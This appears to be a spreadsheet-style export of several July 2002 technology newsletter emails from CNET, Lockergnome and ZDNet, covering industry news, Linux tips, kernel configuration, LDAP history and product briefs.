    <t>![]([URL]http://home.cnet.com[/URL]  \n|\n\n![]([URL]http://i.i.com.com[/URL]\n![]([URL]http://ad.doubleclick.net[/URL];sz=160x600;ord=\[timestamp\]?)\n\n|  ![](/b.gif)  \n  **Search**  \n  \n  News.com All CNET     The Web  \n---  \n  \n![Also from\nCNET]([URL]http://home.cnet.com[/URL]  \n**Live tech help NOW!\n\nApril's tech award\n\n1 million open jobs\n\nNews.com: Top CIOs\n\nZDNet: PeopleSoft **  \n---  \n  \n| ![]([URL]http://home.cnet.com[/URL]  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |  | ![]([URL]http://home.cnet.com[/URL]  \n|  | ![In the News]([URL]http://home.cnet.com[/URL]  \n| July 16, 2002  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] Microsoft reveals media XP details  \n![]([URL]http://home.cnet.com[/URL] Mac tech show set to open in New\nYork  \n![]([URL]http://home.cnet.com[/URL] HP trims Jornada unit in Singapore  \n![]([URL]http://home.cnet.com[/URL] Tech giants hot on wireless union  \n![]([URL]http://home.cnet.com[/URL] Universal appoints head of anti-\npiracy  \n![]([URL]http://home.cnet.com[/URL] Report: FDIC not protecting data  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n|  | ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |   **Special report**  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL]  \n  \n**A clause for alarm**  \nLearn to spot red flags in corporate software contracts ere you sign on the\ndotted line.  \n**Read Full Story**  \n  \n---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n---  \n**Microsoft reveals media XP details**  \nMicrosoft on Tuesday gave an official name to an upcoming version of Windows\nXP that aims to make the PC a permanent part of the home entertainment center.\nOriginally code-named Freestyle, this entertainment version of Windows--which\nwill go by the name Windows XP Media Center Edition--will appear on new PCs\nand PC hybrids in time for the holidays, the company revealed on Tuesday. With\nWindows Media Center, consumers will be able to use a TV remote control to\ncatalog songs, videos and pictures, as well as check TV listings.  \nJuly 16, 2002, 4:00 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Mac tech show set to open in New York**  \nApple's iMac is all display--17 inches worth--and the "Jaguar" update to the\nMac OS should bare its teeth as the Mac faithful gather in New York. They'll\nbe looking to get a peek at what the computer maker has planned for the\nfuture.  \nJuly 16, 2002, 4:00 a.m. PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**HP trims Jornada unit in Singapore**  \nHewlett-Packard has shuffled employees out of its Jornada Pocket PC\ndevelopment unit in Singapore, as the company continues to cut costs following\nits merger with Compaq Computer. Jornada products are developed in Singapore\nand will be phased out by year's end, with the exception of Jornada 720, which\nresembles a mini-notebook. The model will eventually be rebranded as an HP\niPaq device.  \nJuly 16, 2002, 11:05 AM PT |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n  \n**Tech giants hot on wireless union**  \nSeveral tech and telecommunications giants are considering a joint venture to\npepper the United States with wireless hot spots, according to reports. Intel,\nIBM, AT&amp;T; Wireless, Verizon Communications and Cingular Wireless are\ndiscussing the creation of a company that would build a network of wireless\nhot spots across the country, The New York Times reported Tuesday. Hotspots\nare publicly available wireless networks that use the 802.11b standard to\ndeliver Internet access.  \nJuly 16, 2002, 7:50 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Universal appoints head of anti-piracy**  \nUniversal Music Group has created a new full-time position to help it combat\npiracy. Lawyer and former music-television producer David Benjamin will fill\nthe role as UMG's new senior vice president of anti-piracy.  \nJuly 16, 2002, 11:45 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Report: FDIC not protecting data**  \nWeaknesses in the Federal Deposit Insurance Corp.'s IT strategy have left\nfinancial information open to attack, a new report says. The report from the\nGeneral Accounting Office identified "new weaknesses" in the FDIC's\ninformation systems controls that affect its ability to safeguard electronic\naccess to sensitive data.  \nJuly 16, 2002, 8:55 AM PT  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n|  **From our partners:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \n**Bezos believes**  \nBusiness Week  \n"We're still at the very beginning," says Amazon.com's founder. "There's so\nmuch more to come."  \nJuly 15, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Stronger, smarter building in less time**  \nBusiness Week  \nPioneers in computer-aided design, architects are now using advanced\ntechnology to model their designs in ever-greater detail.  \nJuly 16, 2002  |  **Read Full Story**\n![]([URL]http://home.cnet.com[/URL]\n\n**Also from CNET:**  \n---  \n![]([URL]http://a.r.tv.com[/URL]  \n![]([URL]http://a.r.tv.com[/URL]  \nReal-time stock quotes from CNET News.com Investor.  \n30-day free trial!  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |  ![Crucial\n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n  \n![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://news.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n|  **'Jaguar' may show its claws at MacWorld**  \nCorrespondent Melissa Francis and CNET News.com reporter Ian Fried talk about\nJaguar, the anticipated update to Mac OS X and new, larger iMac flat-panel\nscreens, both expected to be unveiled at this week's MacWorld.  \n![]([URL]http://news.cnet.com[/URL] **Watch Video**  \n  \n---|---|---  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]  \n![]([URL]http://home.cnet.com[/URL] | ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL] |  \n| ![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL] |\n![]([URL]http://home.cnet.com[/URL]  \n  \n---|---|---  \n![]([URL]http://home.cnet.com[/URL]  \n  \n![]([URL]http://home.cnet.com[/URL]  \n  \n  \n**Enterprise**  \n\n  * Norway snubs exclusive Microsoft deals\n  * McAfee.com sour on sweetened bid\n  * AT&amp;T;, Sun come up with services deal \n|\n\n**E-Business**  \n\n  * Schwab profit falls with investor confidence\n  * Tech stocks seek good earnings news\n  * More hurdles await e-government \n  \n---|---  \n  \n**Communications**  \n\n  * Industry preps for new cell standard\n  * Nextel turns profit on customer demand\n  * TDS, U.S. Cellular end quarter with losses \n|\n\n**Media**  \n\n  * Radio stations appeal Web royalties\n  * Licensing decision ends MPEG-4 tiff\n  * Congress to weigh in on digital TV \n  \n  \n**Personal Technology**  \n\n  * Moxi moves into cable boxes\n  * Dell squeezes Pentiums into notebooks\n  * Santa goes digital \n|  \n  \n![]([URL]http://home.cnet.com[/URL]  \n| ![]([URL]http://home.cnet.com[/URL]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n\nThe e-mail address for your subscription is qqqqqqqqqq-zdnet@example.com  \nUnsubscribe | Manage My Subscriptions | FAQ | Advertise\n\nPlease send any questions, comments, or concerns to dispatchfeedback@news.com.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33&amp;ISSUE=2002-07-16)  \n  \n---|---  \n![]([URL]http://clickthru.online.com[/URL]\n\n</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Penguin Shell&lt;subscriptions@lockergnome.com&gt;\nDate: Tue, 16 Jul 2002 12:17:29 -0500</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 12:17:29 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Penguin Shell]  Good Hearts</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![Linux\nCentral]([URL]http://www.qksrv.net[/URL]  \n  \n---  \n|\n\n  07.15.2002 PenguinREPORT  \n  \n---  \n  \n**CAREER SERVICES FROM LOCKERGNOME AND DICE.COM:** We've teamed up with\nDice.com to bring you a full service I.T. career enhancement solution. Whether\nyou are looking for your dream job or trying to hire talented people, the\nfull-featured career resource center is the place to start. Find your IT\ntalent solution today!  \n---  \n  \nYou're a good bunch, you Penguins.\n\nToday's GnomeVOICE really tells the story better than I can, but I'll give you\na quick summary. Through your efforts and compassion, reader Karl Steenblik\nhas found a new electronic home for the Foundation for Children and Youth With\nDiabetes. I'll let Karl tell you which offered solution suited his needs. But,\nwith the volume of responses his request for help generated, it's almost\nirrelevant. As I expected, we came together as a community and collectively\noffered him many viable choices from which to pick a solution that would work\nfor the kids. The global scope of your concern and our collective ability to\neffect a change has humbled me once again. Just when you start to get a little\ncallous about the 'Net ...\n\nAccordingly, I'd like to sketch out an idea with you that can be an ongoing\npart of Penguin Shell. It's an open discussion, really, about how we can\nfurther put our technical skills (be they Linux _or_ Windows skills) to work\nfor a good cause. I'm proposing that we start an organized volunteer effort,\nbased in the Penguin Shell readership, to provide volunteer technical services\nto worthwhile charitable organizations. First, we need a name that clearly\ndescribes our purpose. Next, we need volunteers with the time and ability to\nlend those skills to a good cause. Finally, we'll need some suggestions as to\nthe charitable organizations that are near and dear to your heart. Or, maybe\nthe organization is one you're already working with - one you're certain can\nuse some hands-on or remote volunteer help.\n\nI'll start that ball rolling with a personal organizational suggestions - the\nAicardi Syndrome Foundation. Though I don't currently know their technical\nneeds, I do know that the syndrome is very rare - read "research and technical\ndollars are minimal." I'm sure we can, as a group, provide them a way to fill\nexisting technical holes.\n\nThat's just a suggestion. Feel free to use the mailto links above to make\nothers.\n\nOver the next few weeks, I plan on modifying my current favorite blogging\nprogram, GeekLog to pull together a community project area where interested\nparties can gather, coordinate and discuss whatever this project might become.\nI'll keep you posted on the details.\n\nIn one of the earliest issues of Penguin Shell, I told a story about Emperor\nPenguins - how they huddle together on the shore, knowing that their\nprotection from predators lies in sheer numbers. When one takes the leap into\nthe water, all the others follow; individual involvement for the good of the\ncommunity.\n\nWhere could the analogy possibly be more fitting?\n\nTony Steidler-Dennison  \n\n  \n\n GnomeTWEAK  \n  \n---  \n  \n**Lockergnome readers, SAVE 50% on the Computing Encyclopedia!** Are you\nlooking for the ultimate computing resource? Discover the _Computing\nEncyclopedia_ from Smart Computing. Regular price $59, SPECIAL OFFER for\nLockergnome readers, get your set TODAY, ONLY $29.95!  \n---  \n  \n**Quick Shortcuts**\n\nLinux is chock full of keyboard shortcuts that, when used, streamline the way\nyou use your system. Today's Tweaks are really user tweaks - built in\nshortcuts you can use to maximize your Linux efficiency. You don't have to\nchange your system, just how you use what's already there. They're two tips\nthat are quick and very easy to learn and remember.\n\nGot a cluttered console screen? Use **[ctrl]+l** to clear it. This does the\nsame thing as the **clear** command with far fewer keystrokes.\n\nDo you want to log out of the console screen quickly? Use the **[ctrl+d** key\ncombination. This will log out the current user. If you're using bash and the\ncurrent user is not root, the [ctrl]+d combination will close the terminal\nwindow, as well.\n\nTo me, any opportunity to save keystrokes is a good one. Better yet, if I can\navoid having to take my fingers from the keyboard to reach for the mouse, then\nI've really saved some time. Though it's tough to quantify the time savings\nusing these keystroke combination shortcuts, intuitively I can tell you it's\nsubstantial.\n\nMaximum efficiency. That's what Tweaks are all about.\n\nRecommend It!  \nSend us a GnomeTWEAK\n\n  \n\n GnomeCORE  \n  \n---  \n  \n**Kernel Configuration - Part XI**\n\nWe've covered some fairly light topics to this point in the kernel\nconfiguration series. Today's topic requires a bit of review. We'll discuss\nconfiguring block devices in your kernel.\n\nWe've talked about the different types of devices in previous Penguin Shell\nissues. Fundamentally, the two that you'll deal with the most are block and\ncharacter devices. These draw their type names from the way they handle data.\nBlock devices receive data for storage in chunks, generally pre-set sizes of\ndata "blocks." Hard drives are block devices. They'll only write chunks of\ndata to storage. Thus, the problem with shutting down your machine uncleanly.\nData intended for storage may not, in fact, have been written at the time your\npower dies or you hard kill your machine. The system may still be accumulating\ndata up to the proper block size before committing it to the hard drive.\n\nCharacter devices, on the other hand, receive data in "streams," one character\nat a time. Serial ports are a great example of character devices. They handle\ndata input and output on the fly, rather than filling a buffer _then_\ncommitting the data.\n\nThe physical nature of these device types goes a long way toward explaining\nwhy they handle data as they do. A hard drive has to physically spin up to\nstore or retrieve data. You're actually changing the magnetic properties of\nthe disc surface when you store data. Consequently, a hard drive has to know\nwhere there's free space on the disc surface, has to move that area of the\ndisc under the write head and try, as best it can, to group blocks of related\ndata together.\n\nCharacter devices really don't store data as much as they send it off and\nforget about it. The process is purely electrical rather than electrical and\nphysical. The serial port, for example, sends data in a stream to your Palm\nPilot. The storage of the data is actually handled by the Palm itself, not a\nphysical storage device on the computer. There's no need to spin up a drive\nand account for the data as is necessary with a hard drive. The Palm will also\nsend a signal back to the computer confirming receipt of data. That's an\nindication that character devices often communicate in both directions, as\nwell.\n\nSo, when you're configuring block devices in your kernel, you're preparing the\nsystem for communicating with a device that will buffer data to a\npredetermined level, then write that data as a block, changing the physical\nproperties of the hard drive disc surface. Even though that's the highest\nlevel view of the process, it still shows how difficult a process physical\ndata storage really is.\n\nIn the block device section, you'll find many options for physical data\nstorage. When configuring this section, it's crucial to know as much about\nyour existing hardware as possible. What type (brand) of hard drives are you\nusing? What's the interface to the machine - IDE, parallel, etc? Where is the\ndrive located - on the local machine or on a network-connected box? Because\nthe variables are so broad, it's nearly impossible to give you a stock\nconfiguration tip that will work for your personal machine every time. I can\ntell you this - you will have block devices (normally a hard drive and a\nfloppy), and you need to answer as many of the above questions as you can.\nFind out as much about these physical devices as you can, and the\nconfiguration process will be relatively painless.\n\nA warning - you'll see more configuration tips like this as the series\ncontinues to progress. I'll certainly make hands-on configuration\nrecommendations where possible. There are quite a few areas where I can make\nsuch recommendations. However, where the variable set is as broad as block\ndevices, much of the legwork will be up to you.\n\nTomorrow, we'll talk about RAID and multi-device support in Linux.\n\nRecommend It!  \nSend us a GnomeCORE tip\n\n  \n\n GnomeFILE  \n  \n---  \n  \n**rxLinux**\n\n  \n[URL]http://www.fusionw3.com[/URL]\n\n"The concept behind rxlinux is to centralise configuration and management of\nmultiple Linux servers. New servers can be deployed in minutes. A Web\ninterface is used to build custom ISO CD-ROMs dedicated for specific servers.\nServers, also called rxnodes, boot up from that CD-ROM and get the rest of the\nconfiguration and software from a master server. No administration is done\ndirectly on the nodes; everything is controlled from the master servers. When\nthe rxnode has finished booting up and all software is running, it is\ncompletely independent from the rxmaster until the next reboot."\n\nRecommend It!  \nSend us a GnomeFILE suggestion\n\n  \n\n GnomeVOICE  \n  \n---  \n  \n**Penguin Hearts**  \nScribbled by Karl Steenblik\n\n"I can not believe all of the help your posting to the Linux community has\ngenerated. I have had over 20 offers for help. Some of the offers would not\nfit our space needs but that number of responses shows that Linux people care.\n\n"I am overwhelmed with gratitude with Lockergnome and [URL]http://digitaldaze.com[/URL]\n\n"Bill at Digitaldaze has sent us a large gift of 100 MB of space. More that I\nthink we will ever use.\n\n"I thank all of the people who offered help. There are more generous people\nthan I can type to individually. Our camp will hold Linux people in the\nhighest esteem and I will make sure Linux, Lockergnome, and Digitaldaze have a\nprominent places on our site in the future.\n\n"Soon you will be able to visit our new site at [URL]http://fcyd.digitaldaze.com[/URL]\n\n"Now the work for me begins, moving the site! Oh the labors of love that make\nus whole.\n\n"Everyone have a super day.\n\n"Thank you again for all of your help.\n\nRecommend It!  \nSpeak your GnomeVOICE\n\n  \n\n GnomeCLICK  \n  \n---  \n  \n**Software.Linux.Com**\n\n[URL]http://software.linux.com[/URL]\n\nSoftware.Linux.Com is the revitalized version of Linux.DaveCentral. True to\nits roots, the site is a great starting point for Linux software and\ninformation. Software is categorized under such headings as Audio, File\nUtilities, Office Applications, and System Utilities. The site also features\nup-to-date listings of the most recent and most popular Linux software, as\nwell as a program of the day. This site will definitely get bigger, but even\nfor now, it's got nearly any Linux app you're looking for.\n\nRecommend It!  \nSuggest a GnomeCLICK\n\n  \n\n|  [URL]http://www.lockergnome.com[/URL]\n\nYour subscribed e-mail address is: [qqqqqqqqqq-lg@example.com] - To\nunsubscribe or change your delivery address, please visit the subscription\nmanagement page. Use of the Gnome moniker by Penguin Shell does not imply\nendorsement of the Gnome Desktop Environment. Penguin Shell is an equal-\nopportunity desktop employer. For further information, please refer to the\nGnomeCREDITS in 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See You in\nAugust!]([URL]http://chris.pirillo.com[/URL]\n\n Tell a Friend About Us!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 Win a Digital Camera  \n\n General Feedback  \n Chris's Blog  \n E-mail the Editor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www.qksrv.net http://www.fusionw3.com http://digitaldaze.com http://fcyd.digitaldaze.com http://software.linux.com http://www.lockergnome.com http://chris.pirillo.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-lg@example.com\nFrom: Lockergnome Tech Specialist &lt;subscriptions@lockergnome.com&gt;\nDate: Tue, 16 Jul 2002 09:51:41 -0500</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 09:51:41 -0500</t>
  </si>
  <si>
    <t>[Lockergnome Tech Specialist]  Frequent Format</t>
  </si>
  <si>
    <t>![Lockergnome]([URL]http://images.lockergnome.com[/URL] ![Download\nOur eBooks]([URL]http://images.lockergnome.com[/URL]  \n  \n---  \n|\n\n  07.16.2002 GnomeREPORT  \n  \n---  \n  \n**"A network administrators tool kit"** OpalisRobot automates a broad range of\nadmin tasks including system monitoring, corrective action and job scheduling.\nIt detects and corrects system errors &amp; automates jobs, enabling proactive\nmanagement of business-critical servers. Download &amp; test-drive OpalisRobot\ntoday!  \n---  \n  \nBeing that I have a print subscription to PocketPC Magazine, I haven't been by\ntheir website in quite some time, so when Hal Goldstein informed me of a new\nelectronic delivery method that they've employed, I felt obligated to give it\na spin. You can check out the September 2002 Issue of the Digital Edition and\nsee if you like reading the mag in that format better than the print variety.\nA Software and Accessories Encyclopedia is also new to the site since my last\nbelated visit.\n\nI've also been using my PocketPC quite a bit lately, but not for data. It's\nfound a more frequent home on my belt as an MP3 player ever since Diana's dad\ngave us a bicycle. Going out for a morning ride has been quite pleasurable,\nand it's nice to bring along some tunes. I've tried both the Compaq iPaq 3870\nand HP Jornada 565, and have been more pleased with the audio ability of the\niPaq, due in part to the sound utility Compaq provides to adjust treble and\nbass levels. It's just a more full-sounding device, in my opinion.\n\nSee You in August,  \nRandy Nieland  \n\n  \n\n GnomeNETWORK  \n  \n---  \n  \n**LDAP Whodunit**  \nPondered by Warren Dugas\n\n"Randy, a little question for you: Do you know what LDAP is and how important\nit is to the world of technology? I'm sure you do - but where did it come\nfrom? Hmm, let's put our thinking caps on and try to figure it out. Did\nMicrosoft create it? Hmm - No, how about Novell? Nope. Well, who then?"\n\nHistory of LDAP\n\n[URL]http://www.microsoft.com[/URL]\n\nX.500, the OSI directory standard, defines a comprehensive Directory Service,\nincluding an information model, namespace, functional model, and\nauthentication framework. X.500 also defines the Directory Access Protocol\n(DAP) used by clients to access the directory. DAP is a full OSI protocol that\ncontains extensive functionality, much of which is not used by most\napplications.\n\nDAP is significantly more complicated than the more prevalent TCP/IP stack\nimplementations and requires more code and computing horsepower to run. The\nsize and complexity of DAP makes it difficult to run on thin clients, such as\nthe PC and Macintosh where TCP/IP functionality often comes with the machine.\nDAP stack implementations are cumbersome to administer, thus limiting the\nacceptance of X.500. Hence in 1993, the folks at University of Michigan, with\nhelp from the ISODE Consortium, designed and developed a protocol that would\nwork over TCP/IP and was small enough when implemented to run on a thin client\nlike PC's running the Windows operating system or the Macintosh.\n\nThe LDAP version 1 Specification was published in March of 1994. The LDAP\nversion 2 Specification was published as rfc 1777 by the Access Searching and\nIndexing of Directories (ASID) working group in the IETF in March of 1995. In\nApril of 1996, 40 companies including Microsoft, Netscape, and Novell\nseparately announced support for LDAP protocol in their Directory Services\nproducts in order that they may in turn operate with each other and integrate\nwith the Internet. LDAP version 3.0 has gone through several drafts but at\nthis time is not finished.\n\n  \n\n GnomeSYSTEM  \n  \n---  \n  \n**Looking for Sound**  \nSuggested by Corey Hollett\n\n[URL]http://www.turtlebeach.com[/URL]  \n[URL]http://www.3dsoundsurge.com[/URL]\n\n_"I've just gone on an extensive hunt for the best sound card and speaker set\ncombination for 5.1 sound. My criteria were that it be excellent for games,\nmusic, and dvd playback. A price under $500.00 was also a strong point."_\n\nCorey came to the same conclusion that others have in two respects. Creative\nhas long maintained a healthy share of the sound card market with a solid name\nand decent products. Audiophiles know of other brands as well, such as Turtle\nBeach and Philips, which also produce quality sound cards and at attractive\nprice points. Corey decided on the Turtle Beach Santa Cruz card, a great\nchoice.\n\nHis choice of speaker systems reinforced my own feelings on the subject. I own\ntwo Klipsch speaker sets, the ProMedia 2.400 and most recently the ProMedia\n5.1. The 2.400 system was the subject of many positive reviews, and believe me\nwhen I say that the ProMedia 5.1 leaves the 2.400 in the dust. The above\nreview that Corey pointed out hits the high points, and is actually quite in-\ndepth for an "initial" review. I'm itching to see if they eventually do write\nup a more complete version, as mentioned in the article.\n\n  \n\n GnomeALERTZ  \n  \n---  \n  \n**Today's Top 5 kbAlertz**\n\n  * Q269272 - Mail Client Address List Truncated Using "Mailto:" Link If Tag Exceeds 260 Characters (Q269272)\n  * Q313043 - FIX: Creation of Local Cube Fails (Q313043)\n  * Q320273 - Subfolders of a Web Folder Are Not Enumerated in the Folders Pane in Windows XP (Q320273)\n  * Q241210 - Drive List Shows Only Program Drive in 16-Bit and 32-Bit Programs (Q241210)\n  * Q241189 - SNMP Memory Leak in Windows NT4.0 Peer-to-Peer Network (Q241189)\n\n**GET HIGH-SPEED ACCESS:** Verizon Online DSL is an affordable, high-speed\nInternet connection. Click here to see if Verizon Online DSL is available in\nyour area. ![]([URL]http://www.qksrv.net[/URL]  \n---  \n  \nRecommend It!\n\n  \n\n GnomeASSISTANT  \n  \n---  \n  \n**QuickTime 6 Released**\n\n[URL]http://www.apple.com[/URL]\n\nWith the debut of QuickTime 6, we can assume that the licensing haggles over\nMPEG-4 have been resolved, making way for the long-awaited release. MPEG-4\nisn't the only addition, joining a new AAC audio codec that is a favorite\namong professionals. Streaming media skip protection, Flash 5 support and\nbetter AppleScript functionality also tag along. As always, there is a\nstandard free version available for download, but the Pro edition adds\nadditional features, such as full screen video playback, the ability to create\nMPEG-4 content and editing features not present in the free player.\n\n  \n\n GnomeSTUFF  \n  \n---  \n  \n**Microtel &amp; WalMart Love Linux**\n\n[URL]http://www.theregister.co.uk[/URL]\n\nWalMart is selling Microtel PCs, but with a slight twist. They were one of the\nfirst manufacturers to preinstall LindowsOS and offer systems to the retail\nmarket through WalMart.com, and now Mandrake is being offered as a pre-\ninstalled choice in operating systems. These options give potential Linux\nusers an easier way to get started without having to build their own system\nfrom scratch or deal with driver issues, while still maintaining a low overall\ncost. A Pentium 4 2GHz system with a CD-RW drive goes for as little as $648\nwith Mandrake Linux, so not too shabby at all.\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 Tell a Friend About Us!  \n Suggest a Feature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n E-mail a Suggestion  \n Your Rant / Rave  \n General Feedback  \n The Editor's Blog  \n E-mail the Editor  \n\n\n\nSOUND SYSTEMS  \n  \n---  \n  \nYamaha RX-V1200  \nSony DAVC900  \nHarman Kardon AVR520  \nDenon AVR5803  \nPioneer VSXD811S  \nPioneer Elite VSX49TX  \nSony HTDDW840  \nYamaha HTR5560  \nBOSE LS122BK  \nSony DAVC450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images.lockergnome.com http://www.microsoft.com http://www.turtlebeach.com http://www.3dsoundsurge.com http://www.qksrv.net http://www.apple.com http://www.theregister.co.uk http://www.lockergnome.com http://www.lockergnome.com</t>
  </si>
  <si>
    <t>To: qqqqqqqqqq-zdnet@example.com\nFrom: ZDNet Tech Update Today &lt;Online#3.20169.fa-3pmilTNAYqM0ZdRR.1@newsletter.online.com&gt;\nDate: Tue, 16 Jul 2002 05:26:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>Tue, 16 Jul 2002 05:26:26 -0700 (PDT)</t>
  </si>
  <si>
    <t>ZDNet Tech Update Today &lt;Online#3.20169.fa-3pmilTNAYqM0ZdRR.1@newsletter.online.com&gt;</t>
  </si>
  <si>
    <t>Bridging the gap between Liberty and Microsoft (Tech Update)</t>
  </si>
  <si>
    <t>\n\n![Tech Update Today]([URL]http://www.zdnet.com[/URL]\n|  | ![]([URL]http://www.zdnet.com[/URL]  \n---|---|---  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL] |  | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n\n![Tech Update Today]([URL]http://www.zdnet.com[/URL]  \n\n![]([URL]http://www.zdnet.com[/URL]  \n\nVITAL SIGNS FOR JULY 15, 2002  \n\n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n---  \n**David Berlind**  \n**Bridging the gap between Liberty and Microsoft**  \nIt appears that we are closer to a solution for single sign-on and identity\nmanagement. But what if Microsoft chooses not to support Liberty's\nspecifications?  \n![]([URL]http://www.zdnet.com[/URL] **Let's look at the\nworst-case scenario**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] | ![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n**Latest from ZDNet News**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] White House reviews\nsecurity backbone  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] HP deletes e-business\nsoftware  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Breaking the wireless\nspeed barrier?  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Pentium 4 to power Dell\nbudget PCs  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] AMD chips at mobile,\nflash markets  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Norway cancels Microsoft\ncontract  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] Hackers challenge\nInternet monitoring  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL] **More Enterprise News**  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n| ![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://www.zdnet.com[/URL]  \n**Farber's Picks**  \n|  ![]([URL]http://www.zdnet.com[/URL]  \n---  \n![]([URL]http://www.zdnet.com[/URL]  \n![]([URL]http://image.com.com[/URL]  \n\nDan  \nFarber\n\n![]([URL]http://www.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**Microsoft stresses security for Exchange**  \nMicrosoft is readying a new Exchange Server e-mail system, with improved\nsecurity, a facelift for Outlook, and better support for cell phones and other\nhandhelds. The upcoming version, the company's first major update of the\nproduct since releasing Exchange 2000 nearly two years ago, will by default\n**disable certain messaging features** to prevent hackers and virus makers\nfrom taking advantage of openings. While Microsoft's biggest nemesis in the\ne-mail and messaging market is **Lotus** , the company also competes against\n**Novell** and newcomer **Oracle** , which plans to release its own e-mail and\nmessaging software later this year.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**\n\n**IBM puts more bite in 'Shark'**  \nCan IBM's release of a new top-end "Shark" **enterprise storage system** boost\nthe company's prospects in the depressed storage market? Big Blue has fixed\nmany early Shark problems, improving everything from data transfer\ncapabilities to cache size, and adding **RAID 10 support** and Eliza self-\nhealing features. But IBM faces the still dominant **EMC** , which last week\nlured away Mark Lewis from HP to become its new CTO; and **Hitachi** , which\nstill boasts the technology edge. IBM's edge is its ability to bundle Shark\nsales with related server and service deals.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**\n\n**Report: Linux hack attacks on the rise**  \nHackers are increasingly targeting Linux-based Web servers, while the number\nof successful attacks on **Windows** systems has decreased, according to a new\nreport. Linux server applications are often vulnerable to attack because of\n**mismanagement** , according to the study, which urges Linux system\nadministrators to be more vigilant about patching known security bugs.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**\n\n**Frethem worm variant: "Re: Your password!"**  \nAn e-mail message that promises to reveal **secret information** with a\npassword is a variant from the pesky Frethem worm family. Frethem.k (aka\nw32.frethem.k@mm) is a more robust version of Frethem.e, which uses its own\nSMTP engine to send e-mail using addresses obtained from infected systems. Mac\nand Linux users are not affected.  \n![]([URL]http://www.zdnet.com[/URL] **Read the full story**\n\n![]([URL]http://techupdate.zdnet.com[/URL] |\n![]([URL]http://www.zdnet.com[/URL]  \n---|---  \n**An improved CLIE**  \nWith the CLIE PEG-T665C, Sony took everything good about the PEG-T615C--\nincluding its terrific color screen and solid design--and added a faster\nprocessor and MP3 support to make quite an **attractive Palm OS PDA**. But\nwith Pocket PCs now selling for less than this CLIE and a whole new Palm OS on\nthe horizon, is this the right time to invest in the T665C?  \n![]([URL]http://www.zdnet.com[/URL] **Read the full review**\n\n![]([URL]http://www.zdnet.com[/URL] me at\n**dan.farber@cnet.com**  \n  \n![]([URL]http://www.zdnet.com[/URL]**Back to top**  \n  \n  \n  